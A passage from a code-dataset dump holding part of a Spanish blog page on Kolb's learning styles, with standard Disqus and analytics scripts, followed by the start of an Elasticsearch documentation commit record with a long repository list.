superior.<\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_clasificaci_n\">Clasificaci\u00f3n<\/h3>\n<div class=\"paragraph\">\n<p>Los modelos existentes sobre estilos de aprendizaje ofrecen un marco conceptual para entender los comportamientos observados en el aula, los cuales brindan una\nexplicaci\u00f3n sobre la relaci\u00f3n de esos comportamientos con la forma en que est\u00e1n aprendiendo los alumnos y el tipo de estrategias de ense\u00f1anza que pueden resultar m\u00e1s eficaces en un momento determinado, ya sea por el contenido tem\u00e1tico en s\u00ed, o bien por las diversas interacciones sociales que se desarrollan en el aula.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>De esta manera tenemos varias clasificaciones, las cuales se muestran en la siguiente tabla:<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png\" alt=\"Clasificaci\u00f3n estilos de aprendizaje\" width=\"800\" height=\"400\" role=\"right\"><\/span><\/p>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_modelo_de_kolb\">Modelo de Kolb<\/h3>\n<div class=\"paragraph\">\n<p>El aprendizaje experiencial progresa a trav\u00e9s de un ciclo de actividades a las que se conoce habitualmente como ciclo de aprendizaje de Kolb (David Kolb, 1984).<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>El ciclo tiene cuatro componentes, cada uno de los cuales plantea retos concretos a la hora de planificar actividades acad\u00e9micas.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p><span class=\"image\"><img src=\"http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg\" alt=\"ciclos modelo kolb\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Acorde a este modelo, una persona suele establecer su estilo de aprendizaje en 1 o m\u00e1ximo 2 de estas fases y de esta manera podemos clasificar a nuestros estudiantes acorde a la fase en que prefieran trabajar.<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Activo<\/p>\n<\/li>\n<li>\n<p>Reflexivo<\/p>\n<\/li>\n<li>\n<p>Te\u00f3rico<\/p>\n<\/li>\n<li>\n<p>Pragm\u00e1tico<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div 
class=\"sect2\">\n<h3 id=\"_car_ter_sticas_de_cada_estilo\">Car\u00e1ter\u00edsticas de cada estilo<\/h3>\n<div class=\"paragraph\">\n<p>Para lograr proponer\/emplear estrategias de aprendizaje apropiadas para cada estilo revisemos las caracter\u00edsticas de cada uno:<\/p>\n<\/div>\n<table class=\"tableblock frame-all grid-all\">\n<caption class=\"title\">Table 1. Caracter\u00edsticas Estilos de parendizaje modelo Kolb<\/caption>\n<colgroup>\n<col>\n<col>\n<col>\n<col>\n<\/colgroup>\n<thead>\n<tr>\n<th class=\"tableblock halign-left valign-top\">Estilo<\/th>\n<th class=\"tableblock halign-left valign-top\">Caracter\u00edstica General<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando facilita el aprendizaje<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando NO facilita el aprendizaje.<\/th>\n<\/tr>\n<\/thead>\n<tfoot>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Pr\u00e1gm\u00e1ticos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Gustan de poner en pr\u00e1ctica las ideas, teor\u00edas, t\u00e9cnicas nuevas y verificar su funcionamiento, forma de uso\/aplicaci\u00f3n. Generan\/buscan ideas y las ejecutan inmediatamente. Se basan en la realidad para plantear alternativas a fin de de tomar decisiones sobre algo. Buscan desaf\u00edos, replantear algo con una diferente perspectiva. Discuten un tema brevemenete, les aburren los debates largos. <strong>La pregunta que quieren responder es: <em>\u00bfQu\u00e9 pasar\u00eda si?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades que enlacen la teor\u00eda con la pr\u00e1ctica. Visualizan trabajo\/movimiento\/acci\u00f3n. Posibilidad de aplicaci\u00f3n de algo aprendido.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando todo queda en teor\u00eda. Lo aprendido no se vincula con la realidad o necesidades puntuales. Actividades que no se identifique una finalidad con claridad.<\/p><\/td>\n<\/tr>\n<\/tfoot>\n<tbody>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Activos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Se involucran totalmente y sin prejuicios en las experiencias nuevas.\nDisfrutan el momento y cada acontecimiiento. Entusiastas ente lo nuevo. Actuan primero y luego piensan en las consecuencias. Disfrutan trabajando en equipo siendo el eje del grupo. Les aburre planificar a largo plazo y consolidar poryectos.\n<strong>La pregunta que buscan responder en el aprendizaje es: <em>\u00bfC\u00f3mo?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Plantendo actividades desafiantes . Actividades de resultados immediatos o a corto plazo. Actividades activas de emoci\u00f3n, drama, acci\u00f3n.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Siendo pasivos. Demasiado an\u00e1lisis de un tema o mucha reflexi\u00f3n sobre algo. Trabajo individual.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Reflexivo<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adoptan una postura observadora de an\u00e1lsis en base a datos, experiencias desde varias perpectivas.Establecen conclusiones en base a argumentos s\u00f3lidos y convincentes. 
Son precavidos y analizan todas las implicaciones de cualquier acci\u00f3n antes de ponerse en\nmovimiento. En las reuniones observan y escuchan antes de hablar, procurando pasar desapercibidos. <strong>La pregunta que quieren responder con el aprendizaje es: <em>\u00bfPor qu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando pueden tener una postura de observador. Analizar situaciones. Se les facilita informaci\u00f3n o datos. Tienen tiempo para reflexionar antes de actuar.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando se les exige ser centro o eje de atenci\u00f3n. Actividades de soluci\u00f3n inmediata. Improvisaci\u00f3n sobre algo. Actividades que les apresuren.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Te\u00f3ricos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adaptan e integran las teor\u00edas o fundamentos de forma l\u00f3gica. Organizan las cosas de forma secuencial, integrada y coherente. Analizan y sintetizan informaci\u00f3n de forma racional. No son subjetivos ni il\u00f3gicos. <strong>La pregunta que quieren responder es: <em>\u00bfQu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando se parte de teor\u00edas, modelos, sistemas. Ideas o conceptos desafiantes. Actividades que propicien la indagaci\u00f3n o cuestionamientos.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades ambiguas o que generen incertidumbre. Actividades\/situaciones que prioricen sentimientos o emociones. Cuando no se les facilita la teor\u00eda o bases conceptuales.<\/p><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div class=\"admonitionblock note\">\n<table>\n<tr>\n<td class=\"icon\">\n<i class=\"fa icon-note\" title=\"Note\"><\/i>\n<\/td>\n<td class=\"content\">\nEste valor de 3274 d\u00f3lares es el cambio del euro (3000) a d\u00f3lar.\n<\/td>\n<\/tr>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n <\/section>\n\n <\/article>\n\n \n <section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'marchelo2212'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n <\/section>\n \n\n\n\n <footer class=\"footer\">\n <span class=\"footer__copyright\">© 2016. 
All rights reserved.<\/span>\n <span class=\"footer__copyright\"><a href=\"http:\/\/uno.daleanthony.com\" title=\"link to page for Uno Ghost theme\">Uno theme<\/a> by <a href=\"http:\/\/daleanthony.com\" title=\"link to website for Dale-Anthony\">Dale-Anthony<\/a><\/span>\n <span class=\"footer__copyright\">Proudly published with <a href=\"http:\/\/hubpress.io\" title=\"link to Hubpress website\">Hubpress<\/a><\/span>\n <\/footer>\n <\/div>\n <\/div>\n\n <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad(); \n <\/script>\n\n <script type=\"text\/javascript\" src=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/js\/main.js?v=1.0.0\"><\/script>\n \n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-70778105-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n<\/body>\n<\/html>\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"85ef44fd73a1fe5f77ec0c2d97896c7b451ad10f","subject":"Docs: Fix missing comma and boolean true","message":"Docs: Fix missing comma and boolean true\n\nCloses 
#9350\n","repos":"socialrank\/elasticsearch,sreeramjayan\/elasticsearch,adrianbk\/elasticsearch,rhoml\/elasticsearch,gfyoung\/elasticsearch,abibell\/elasticsearch,mbrukman\/elasticsearch,lchennup\/elasticsearch,szroland\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,mapr\/elasticsearch,yuy168\/elasticsearch,markllama\/elasticsearch,easonC\/elasticsearch,EasonYi\/elasticsearch,easonC\/elasticsearch,scorpionvicky\/elasticsearch,drewr\/elasticsearch,AshishThakur\/elasticsearch,AndreKR\/elasticsearch,awislowski\/elasticsearch,nrkkalyan\/elasticsearch,a2lin\/elasticsearch,sdauletau\/elasticsearch,vroyer\/elasticassandra,Ansh90\/elasticsearch,fernandozhu\/elasticsearch,huypx1292\/elasticsearch,Liziyao\/elasticsearch,acchen97\/elasticsearch,markharwood\/elasticsearch,jimhooker2002\/elasticsearch,ckclark\/elasticsearch,bestwpw\/elasticsearch,YosuaMichael\/elasticsearch,Shepard1212\/elasticsearch,codebunt\/elasticsearch,slavau\/elasticsearch,pritishppai\/elasticsearch,rhoml\/elasticsearch,overcome\/elasticsearch,kevinkluge\/elasticsearch,jeteve\/elasticsearch,cnfire\/elasticsearch-1,s1monw\/elasticsearch,myelin\/elasticsearch,sreeramjayan\/elasticsearch,dataduke\/elasticsearch,hanst\/elasticsearch,davidvgalbraith\/elasticsearch,tkssharma\/elasticsearch,mute\/elasticsearch,amit-shar\/elasticsearch,Liziyao\/elasticsearch,mrorii\/elasticsearch,mkis-\/elasticsearch,kingaj\/elasticsearch,EasonYi\/elasticsearch,franklanganke\/elasticsearch,Rygbee\/elasticsearch,PhaedrusTheGreek\/elasticsearch,petabytedata\/elasticsearch,obourgain\/elasticsearch,KimTaehee\/elasticsearch,jchampion\/elasticsearch,smflorentino\/elasticsearch,lydonchandra\/elasticsearch,nazarewk\/elasticsearch,wittyameta\/elasticsearch,sjohnr\/elasticsearch,iantruslove\/elasticsearch,kevinkluge\/elasticsearch,StefanGor\/elasticsearch,MichaelLiZhou\/elasticsearch,springning\/elasticsearch,iamjakob\/elasticsearch,AshishThakur\/elasticsearch,vvcephei\/elasticsearch,sc0ttkclark\/elasticsearch,jaynblue\/elasticsearch,tahaemin\/elasticsearch,slavau\/elasticsearch,huanzhong\/elasticsearch,rajanm\/elasticsearch,episerver\/elasticsearch,ouyangkongtong\/elasticsearch,ImpressTV\/elasticsearch,Helen-Zhao\/elasticsearch,snikch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,bawse\/elasticsearch,sauravmondallive\/elasticsearch,khiraiwa\/elasticsearch,LeoYao\/elasticsearch,golubev\/elasticsearch,sreeramjayan\/elasticsearch,hanswang\/elasticsearch,huypx1292\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,markharwood\/elasticsearch,rlugojr\/elasticsearch,iantruslove\/elasticsearch,tebriel\/elasticsearch,rhoml\/elasticsearch,rento19962\/elasticsearch,nilabhsagar\/elasticsearch,liweinan0423\/elasticsearch,amaliujia\/elasticsearch,vvcephei\/elasticsearch,jaynblue\/elasticsearch,koxa29\/elasticsearch,MaineC\/elasticsearch,weipinghe\/elasticsearch,andrestc\/elasticsearch,jbertouch\/elasticsearch,elasticdog\/elasticsearch,jprante\/elasticsearch,lchennup\/elasticsearch,nrkkalyan\/elasticsearch,NBSW\/elasticsearch,bestwpw\/elasticsearch,javachengwc\/elasticsearch,alexshadow007\/elasticsearch,iantruslove\/elasticsearch,Shekharrajak\/elasticsearch,wbowling\/elasticsearch,adrianbk\/elasticsearch,masaruh\/elasticsearch,chrismwendt\/elasticsearch,codebunt\/elasticsearch,heng4fun\/elasticsearch,MetSystem\/elasticsearch,lydonchandra\/elasticsearch,hydro2k\/elasticsearch,lydonchandra\/elasticsearch,javachengwc\/elasticsearch,dylan8902\/elasticsearch,KimTaehee\/elasticsearch,strapdata\/elassandra5-rc,kubum\/elasticsearch,xuzha\/elasticsearch,acche
n97\/elasticsearch,Flipkart\/elasticsearch,mnylen\/elasticsearch,diendt\/elasticsearch,karthikjaps\/elasticsearch,Stacey-Gammon\/elasticsearch,vietlq\/elasticsearch,AshishThakur\/elasticsearch,NBSW\/elasticsearch,elasticdog\/elasticsearch,Chhunlong\/elasticsearch,xuzha\/elasticsearch,infusionsoft\/elasticsearch,artnowo\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,mrorii\/elasticsearch,wenpos\/elasticsearch,feiqitian\/elasticsearch,karthikjaps\/elasticsearch,tahaemin\/elasticsearch,lks21c\/elasticsearch,fekaputra\/elasticsearch,tahaemin\/elasticsearch,lzo\/elasticsearch-1,Clairebi\/ElasticsearchClone,scorpionvicky\/elasticsearch,fekaputra\/elasticsearch,ESamir\/elasticsearch,djschny\/elasticsearch,snikch\/elasticsearch,Stacey-Gammon\/elasticsearch,queirozfcom\/elasticsearch,wangyuxue\/elasticsearch,vrkansagara\/elasticsearch,pablocastro\/elasticsearch,loconsolutions\/elasticsearch,a2lin\/elasticsearch,Shepard1212\/elasticsearch,mcku\/elasticsearch,easonC\/elasticsearch,aglne\/elasticsearch,mapr\/elasticsearch,nknize\/elasticsearch,gmarz\/elasticsearch,maddin2016\/elasticsearch,schonfeld\/elasticsearch,milodky\/elasticsearch,Stacey-Gammon\/elasticsearch,xingguang2013\/elasticsearch,rlugojr\/elasticsearch,Shekharrajak\/elasticsearch,anti-social\/elasticsearch,nknize\/elasticsearch,awislowski\/elasticsearch,szroland\/elasticsearch,AshishThakur\/elasticsearch,mgalushka\/elasticsearch,pozhidaevak\/elasticsearch,lydonchandra\/elasticsearch,markllama\/elasticsearch,strapdata\/elassandra5-rc,likaiwalkman\/elasticsearch,loconsolutions\/elasticsearch,sjohnr\/elasticsearch,vroyer\/elassandra,martinstuga\/elasticsearch,brandonkearby\/elasticsearch,kalburgimanjunath\/elasticsearch,sjohnr\/elasticsearch,jango2015\/elasticsearch,winstonewert\/elasticsearch,AndreKR\/elasticsearch,dongjoon-hyun\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,acchen97\/elasticsearch,schonfeld\/elasticsearch,a2lin\/elasticsearch,pablocastro\/elasticsearch,wayeast\/elasticsearch,Fsero\/elasticsearch,ulkas\/elasticsearch,dylan8902\/elasticsearch,onegambler\/elasticsearch,xpandan\/elasticsearch,ESamir\/elasticsearch,mm0\/elasticsearch,YosuaMichael\/elasticsearch,alexkuk\/elasticsearch,wayeast\/elasticsearch,nazarewk\/elasticsearch,kkirsche\/elasticsearch,Uiho\/elasticsearch,Shepard1212\/elasticsearch,mjhennig\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Helen-Zhao\/elasticsearch,mm0\/elasticsearch,golubev\/elasticsearch,yongminxia\/elasticsearch,hydro2k\/elasticsearch,rajanm\/elasticsearch,infusionsoft\/elasticsearch,kaneshin\/elasticsearch,chirilo\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra-test,alexkuk\/elasticsearch,SergVro\/elasticsearch,sreeramjayan\/elasticsearch,wayeast\/elasticsearch,trangvh\/elasticsearch,polyfractal\/elasticsearch,lks21c\/elasticsearch,mbrukman\/elasticsearch,aglne\/elasticsearch,tsohil\/elasticsearch,Fsero\/elasticsearch,thecocce\/elasticsearch,henakamaMSFT\/elasticsearch,szroland\/elasticsearch,caengcjd\/elasticsearch,mikemccand\/elasticsearch,kaneshin\/elasticsearch,mmaracic\/elasticsearch,jbertouch\/elasticsearch,springning\/elasticsearch,schonfeld\/elasticsearch,mmaracic\/elasticsearch,onegambler\/elasticsearch,ESamir\/elasticsearch,Siddartha07\/elasticsearch,myelin\/elasticsearch,s1monw\/elasticsearch,girirajsharma\/elasticsearch,pablocastro\/elasticsearch,ulkas\/elasticsearch,slavau\/elasticsearch,lks21c\/elasticsearch,ricardocerq\/elasticsearch,dpursehouse\/elasticsearch,Shekharrajak\/elasticsearch,mjhennig\/elasticsearch,wayeast\/ela
sticsearch,jsgao0\/elasticsearch,sc0ttkclark\/elasticsearch,spiegela\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,nomoa\/elasticsearch,ckclark\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,ulkas\/elasticsearch,chirilo\/elasticsearch,karthikjaps\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,hirdesh2008\/elasticsearch,mbrukman\/elasticsearch,pritishppai\/elasticsearch,kevinkluge\/elasticsearch,jsgao0\/elasticsearch,sc0ttkclark\/elasticsearch,MetSystem\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fernandozhu\/elasticsearch,mapr\/elasticsearch,pozhidaevak\/elasticsearch,elancom\/elasticsearch,HarishAtGitHub\/elasticsearch,jimhooker2002\/elasticsearch,18098924759\/elasticsearch,likaiwalkman\/elasticsearch,iacdingping\/elasticsearch,thecocce\/elasticsearch,a2lin\/elasticsearch,kingaj\/elasticsearch,Flipkart\/elasticsearch,masterweb121\/elasticsearch,truemped\/elasticsearch,HonzaKral\/elasticsearch,socialrank\/elasticsearch,davidvgalbraith\/elasticsearch,ouyangkongtong\/elasticsearch,18098924759\/elasticsearch,vrkansagara\/elasticsearch,MetSystem\/elasticsearch,mbrukman\/elasticsearch,coding0011\/elasticsearch,kenshin233\/elasticsearch,kkirsche\/elasticsearch,wangtuo\/elasticsearch,apepper\/elasticsearch,gfyoung\/elasticsearch,diendt\/elasticsearch,liweinan0423\/elasticsearch,gmarz\/elasticsearch,wittyameta\/elasticsearch,xingguang2013\/elasticsearch,robin13\/elasticsearch,tsohil\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,Asimov4\/elasticsearch,yynil\/elasticsearch,glefloch\/elasticsearch,snikch\/elasticsearch,ZTE-PaaS\/elasticsearch,rmuir\/elasticsearch,xpandan\/elasticsearch,robin13\/elasticsearch,Chhunlong\/elasticsearch,Ansh90\/elasticsearch,tsohil\/elasticsearch,JervyShi\/elasticsearch,sauravmondallive\/elasticsearch,avikurapati\/elasticsearch,fforbeck\/elasticsearch,lzo\/elasticsearch-1,hechunwen\/elasticsearch,yanjunh\/elasticsearch,mgalushka\/elasticsearch,iantruslove\/elasticsearch,mgalushka\/elasticsearch,scottsom\/elasticsearch,Chhunlong\/elasticsearch,amaliujia\/elasticsearch,pranavraman\/elasticsearch,strapdata\/elassandra5-rc,Siddartha07\/elasticsearch,gingerwizard\/elasticsearch,easonC\/elasticsearch,nellicus\/elasticsearch,vroyer\/elassandra,szroland\/elasticsearch,snikch\/elasticsearch,nilabhsagar\/elasticsearch,davidvgalbraith\/elasticsearch,clintongormley\/elasticsearch,Charlesdong\/elasticsearch,Liziyao\/elasticsearch,jprante\/elasticsearch,areek\/elasticsearch,ImpressTV\/elasticsearch,C-Bish\/elasticsearch,iamjakob\/elasticsearch,abibell\/elasticsearch,JSCooke\/elasticsearch,kunallimaye\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra5-rc,nomoa\/elasticsearch,huypx1292\/elasticsearch,AndreKR\/elasticsearch,andrejserafim\/elasticsearch,khiraiwa\/elasticsearch,mapr\/elasticsearch,smflorentino\/elasticsearch,Asimov4\/elasticsearch,karthikjaps\/elasticsearch,luiseduardohdbackup\/elasticsearch,ouyangkongtong\/elasticsearch,dpursehouse\/elasticsearch,kalburgimanjunath\/elasticsearch,zeroctu\/elasticsearch,avikurapati\/elasticsearch,dylan8902\/elasticsearch,lks21c\/elasticsearch,queirozfcom\/elasticsearch,StefanGor\/elasticsearch,hafkensite\/elasticsearch,iamjakob\/elasticsearch,andrejserafim\/elasticsearch,JervyShi\/elasticsearch,mcku\/elasticsearch,Liziyao\/elasticsearch,iamjakob\/elasticsearch,jango2015\/elasticsearch,lmtwga\/elasticsearch,TonyChai24\/ESSource,jprante\/elasticsearch,sc0ttkclark\/elasticsearch,StefanGor\/elasticsearch,alexkuk\/elasticsearch,abibell\/elasticsearch,obour
gain\/elasticsearch,IanvsPoplicola\/elasticsearch,jeteve\/elasticsearch,kkirsche\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,AshishThakur\/elasticsearch,wenpos\/elasticsearch,himanshuag\/elasticsearch,wangtuo\/elasticsearch,mnylen\/elasticsearch,knight1128\/elasticsearch,achow\/elasticsearch,i-am-Nathan\/elasticsearch,Siddartha07\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,qwerty4030\/elasticsearch,dylan8902\/elasticsearch,mnylen\/elasticsearch,franklanganke\/elasticsearch,umeshdangat\/elasticsearch,infusionsoft\/elasticsearch,Microsoft\/elasticsearch,skearns64\/elasticsearch,kkirsche\/elasticsearch,nilabhsagar\/elasticsearch,fekaputra\/elasticsearch,vvcephei\/elasticsearch,anti-social\/elasticsearch,heng4fun\/elasticsearch,andrestc\/elasticsearch,StefanGor\/elasticsearch,clintongormley\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,mkis-\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,rento19962\/elasticsearch,lzo\/elasticsearch-1,andrejserafim\/elasticsearch,wimvds\/elasticsearch,MjAbuz\/elasticsearch,feiqitian\/elasticsearch,fernandozhu\/elasticsearch,masterweb121\/elasticsearch,camilojd\/elasticsearch,Fsero\/elasticsearch,yynil\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,vietlq\/elasticsearch,EasonYi\/elasticsearch,himanshuag\/elasticsearch,amit-shar\/elasticsearch,LeoYao\/elasticsearch,rento19962\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,Widen\/elasticsearch,mikemccand\/elasticsearch,jchampion\/elasticsearch,polyfractal\/elasticsearch,heng4fun\/elasticsearch,xingguang2013\/elasticsearch,overcome\/elasticsearch,fred84\/elasticsearch,awislowski\/elasticsearch,sjohnr\/elasticsearch,hafkensite\/elasticsearch,pranavraman\/elasticsearch,masaruh\/elasticsearch,codebunt\/elasticsearch,mrorii\/elasticsearch,zeroctu\/elasticsearch,TonyChai24\/ESSource,maddin2016\/elasticsearch,szroland\/elasticsearch,mm0\/elasticsearch,MichaelLiZhou\/elasticsearch,skearns64\/elasticsearch,phani546\/elasticsearch,SergVro\/elasticsearch,vingupta3\/elasticsearch,HonzaKral\/elasticsearch,NBSW\/elasticsearch,strapdata\/elassandra-test,elancom\/elasticsearch,wenpos\/elasticsearch,mnylen\/elasticsearch,ulkas\/elasticsearch,easonC\/elasticsearch,ivansun1010\/elasticsearch,Flipkart\/elasticsearch,xpandan\/elasticsearch,sc0ttkclark\/elasticsearch,adrianbk\/elasticsearch,iamjakob\/elasticsearch,achow\/elasticsearch,lightslife\/elasticsearch,vietlq\/elasticsearch,Flipkart\/elasticsearch,pablocastro\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,zhiqinghuang\/elasticsearch,dataduke\/elasticsearch,njlawton\/elasticsearch,kenshin233\/elasticsearch,luiseduardohdbackup\/elasticsearch,golubev\/elasticsearch,adrianbk\/elasticsearch,Clairebi\/ElasticsearchClone,loconsolutions\/elasticsearch,jimhooker2002\/elasticsearch,hirdesh2008\/elasticsearch,phani546\/elasticsearch,camilojd\/elasticsearch,smflorentino\/elasticsearch,cnfire\/elasticsearch-1,likaiwalkman\/elasticsearch,henakamaMSFT\/elasticsearch,trangvh\/elasticsearch,Microsoft\/elasticsearch,C-Bish\/elasticsearch,franklanganke\/elasticsearch,wenpos\/elasticsearch,tahaemin\/elasticsearch,diendt\/elasticsearch,anti-social\/elasticsearch,chirilo\/elasticsearch,linglaiyao1314\/elasticsearch,Kakakakakku\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,tahaemin\/elasticsearch,loconsolutions\/elasticsearch,iacdingping\/elasticsearch,18098924759\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,dylan890
2\/elasticsearch,mcku\/elasticsearch,btiernay\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,vingupta3\/elasticsearch,F0lha\/elasticsearch,markllama\/elasticsearch,phani546\/elasticsearch,huanzhong\/elasticsearch,himanshuag\/elasticsearch,jsgao0\/elasticsearch,cwurm\/elasticsearch,iantruslove\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,cnfire\/elasticsearch-1,hydro2k\/elasticsearch,wbowling\/elasticsearch,bestwpw\/elasticsearch,EasonYi\/elasticsearch,Rygbee\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,andrestc\/elasticsearch,yuy168\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,Rygbee\/elasticsearch,iantruslove\/elasticsearch,amaliujia\/elasticsearch,overcome\/elasticsearch,truemped\/elasticsearch,spiegela\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,Helen-Zhao\/elasticsearch,kenshin233\/elasticsearch,drewr\/elasticsearch,LewayneNaidoo\/elasticsearch,wimvds\/elasticsearch,abibell\/elasticsearch,kubum\/elasticsearch,markwalkom\/elasticsearch,kenshin233\/elasticsearch,abibell\/elasticsearch,pranavraman\/elasticsearch,slavau\/elasticsearch,strapdata\/elassandra-test,schonfeld\/elasticsearch,kimimj\/elasticsearch,JSCooke\/elasticsearch,Widen\/elasticsearch,btiernay\/elasticsearch,elancom\/elasticsearch,gmarz\/elasticsearch,fekaputra\/elasticsearch,nellicus\/elasticsearch,chirilo\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,obourgain\/elasticsearch,sposam\/elasticsearch,szroland\/elasticsearch,springning\/elasticsearch,xpandan\/elasticsearch,wittyameta\/elasticsearch,hydro2k\/elasticsearch,fekaputra\/elasticsearch,HonzaKral\/elasticsearch,vrkansagara\/elasticsearch,Chhunlong\/elasticsearch,nazarewk\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,jeteve\/elasticsearch,pritishppai\/elasticsearch,coding0011\/elasticsearch,anti-social\/elasticsearch,jaynblue\/elasticsearch,rento19962\/elasticsearch,avikurapati\/elasticsearch,MetSystem\/elasticsearch,SergVro\/elasticsearch,huypx1292\/elasticsearch,likaiwalkman\/elasticsearch,lmtwga\/elasticsearch,weipinghe\/elasticsearch,kubum\/elasticsearch,vingupta3\/elasticsearch,jeteve\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,mikemccand\/elasticsearch,henakamaMSFT\/elasticsearch,chirilo\/elasticsearch,dylan8902\/elasticsearch,PhaedrusTheGreek\/elasticsearch,nellicus\/elasticsearch,lightslife\/elasticsearch,sdauletau\/elasticsearch,amit-shar\/elasticsearch,gfyoung\/elasticsearch,pablocastro\/elasticsearch,tahaemin\/elasticsearch,wittyameta\/elasticsearch,uschindler\/elasticsearch,hanswang\/elasticsearch,wuranbo\/elasticsearch,nknize\/elasticsearch,markllama\/elasticsearch,lchennup\/elasticsearch,strapdata\/elassandra-test,kubum\/elasticsearch,Collaborne\/elasticsea